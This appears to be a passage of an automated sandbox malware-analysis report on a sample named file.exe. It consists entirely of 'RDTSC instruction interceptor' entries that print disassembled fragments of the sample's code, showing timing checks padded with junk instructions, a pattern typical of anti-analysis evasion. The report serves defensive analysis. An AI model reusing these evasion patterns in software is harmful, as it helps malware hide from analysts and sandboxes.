                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56884 second address: C56903 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FC41CDAB668h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+12447BEAh] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FC41CDAB668h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov di, FE00h 0x0000004b jmp 00007FC41CDAB674h 0x00000050 push 00000000h 0x00000052 mov edi, 5BAD9778h 0x00000057 mov edi, dword ptr [ebp+122D1B46h] 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56903 second address: C5690A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C539DD second address: C539E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55AC4 second address: C55ACE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC41CC2F0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59A3A second address: C59A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB676h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D3417h], ecx 0x00000012 push 00000000h 0x00000014 add ebx, 54ED3621h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007FC41CDAB668h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push esi 0x0000003b pop esi 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57A0A second address: C57A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57ADA second address: C57AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58B93 second address: C58BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007FC41CC2F0D4h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58BB2 second address: C58BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5AC05 second address: C5AC4D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC41CC2F0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov ebx, 033635CCh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 jg 00007FC41CC2F0DAh 0x0000001d pop eax 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007FC41CC2F0CFh 0x00000027 push esi 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59CAF second address: C59CB5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59CB5 second address: C59CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5E714 second address: C5E728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5E728 second address: C5E72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6412B second address: C6414A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC41CDAB666h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC41CDAB673h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6414A second address: C64152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C638AA second address: C638BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC41CDAB666h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63A28 second address: C63A2E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63A2E second address: C63A57 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FC41CDAB666h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC41CDAB679h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63A57 second address: C63A88 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC41CC2F0D2h 0x00000008 jp 00007FC41CC2F0C6h 0x0000000e jbe 00007FC41CC2F0C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC41CC2F0D5h 0x0000001b jno 00007FC41CC2F0C6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C63D1D second address: C63D3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB674h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C677DD second address: C677FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC41CC2F0D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C677FF second address: C67829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CDAB66Ch 0x00000009 jmp 00007FC41CDAB678h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0470A second address: C0470E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C07D50 second address: C07D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C07D56 second address: C07D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C709A3 second address: C709AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFDC63 second address: BFDC6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74183 second address: C741B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 jbe 00007FC41CDAB671h 0x0000000d pop esi 0x0000000e push esi 0x0000000f jns 00007FC41CDAB679h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C748DA second address: C748E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C748E0 second address: C748E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C748E6 second address: C748EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74A6E second address: C74A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC41CDAB679h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74D63 second address: C74D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007FC41CC2F0E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CC2F0D1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74ECD second address: C74ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74ED3 second address: C74EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC41CC2F0C6h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CC2F0CCh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74EED second address: C74EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74EF2 second address: C74F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CC2F0CCh 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75060 second address: C75068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75068 second address: C7506F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7506F second address: C7507F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC41CDAB668h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7977F second address: C79783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79783 second address: C7978F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FC41CDAB666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C011C7 second address: C011DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC41CC2F0C8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48089 second address: C4808D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4808D second address: C48093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48093 second address: C4809D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC41CDAB666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4809D second address: C480BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0D2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C480BA second address: C480BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C480BF second address: C48127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 movzx ecx, ax 0x0000000b lea eax, dword ptr [ebp+1247DE5Ch] 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FC41CC2F0C8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b call 00007FC41CC2F0D6h 0x00000030 clc 0x00000031 pop edi 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC41CC2F0D9h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48127 second address: C4812C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4812C second address: C28147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jno 00007FC41CC2F0D4h 0x00000010 nop 0x00000011 sub dword ptr [ebp+12475220h], eax 0x00000017 call dword ptr [ebp+122D1ADBh] 0x0000001d push ecx 0x0000001e jg 00007FC41CC2F0C8h 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007FC41CC2F0D4h 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48696 second address: C486A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC41CDAB666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C486A0 second address: C486E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f je 00007FC41CC2F0EBh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC41CC2F0D9h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4885C second address: C488B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 xchg eax, esi 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FC41CDAB668h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 sub dword ptr [ebp+1244A67Fh], eax 0x00000029 call 00007FC41CDAB679h 0x0000002e mov dx, bx 0x00000031 pop edx 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C489AC second address: C489B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C489B0 second address: C489F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC41CDAB678h 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edx 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC41CDAB676h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C489F9 second address: C48A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48A16 second address: C48A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48B0C second address: C48B20 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC41CC2F0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C48B20 second address: C48B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41CDAB66Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4945E second address: C49493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d jng 00007FC41CC2F0C8h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC41CC2F0D9h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C49545 second address: C495AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c jmp 00007FC41CDAB66Eh 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FC41CDAB668h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov di, si 0x00000031 lea eax, dword ptr [ebp+1247DEA0h] 0x00000037 movzx edi, cx 0x0000003a push eax 0x0000003b pushad 0x0000003c jmp 00007FC41CDAB66Fh 0x00000041 pushad 0x00000042 jp 00007FC41CDAB666h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C78E99 second address: C78EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FC41CC2F0CFh 0x0000000d jng 00007FC41CC2F0C6h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79158 second address: C79165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007FC41CDAB66Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79165 second address: C7916C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7916C second address: C79189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 jnc 00007FC41CDAB672h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79189 second address: C7918D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7918D second address: C79191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79191 second address: C79197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28C7B second address: C28C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28C81 second address: C28C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28C85 second address: C28C8F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41CDAB666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79320 second address: C79340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D2h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FC41CC2F0C8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79340 second address: C79347 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C886 second address: C7C8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CC2F0D7h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC41CC2F0D2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C8B7 second address: C7C8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC41CDAB666h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CDAB671h 0x00000013 jno 00007FC41CDAB66Ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C8E0 second address: C7C8E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C8E8 second address: C7C8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C8EC second address: C7C8F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C8F0 second address: C7C8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81559 second address: C81587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CC2F0D0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC41CC2F0D7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81587 second address: C8158F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8158F second address: C81599 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC41CC2F0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
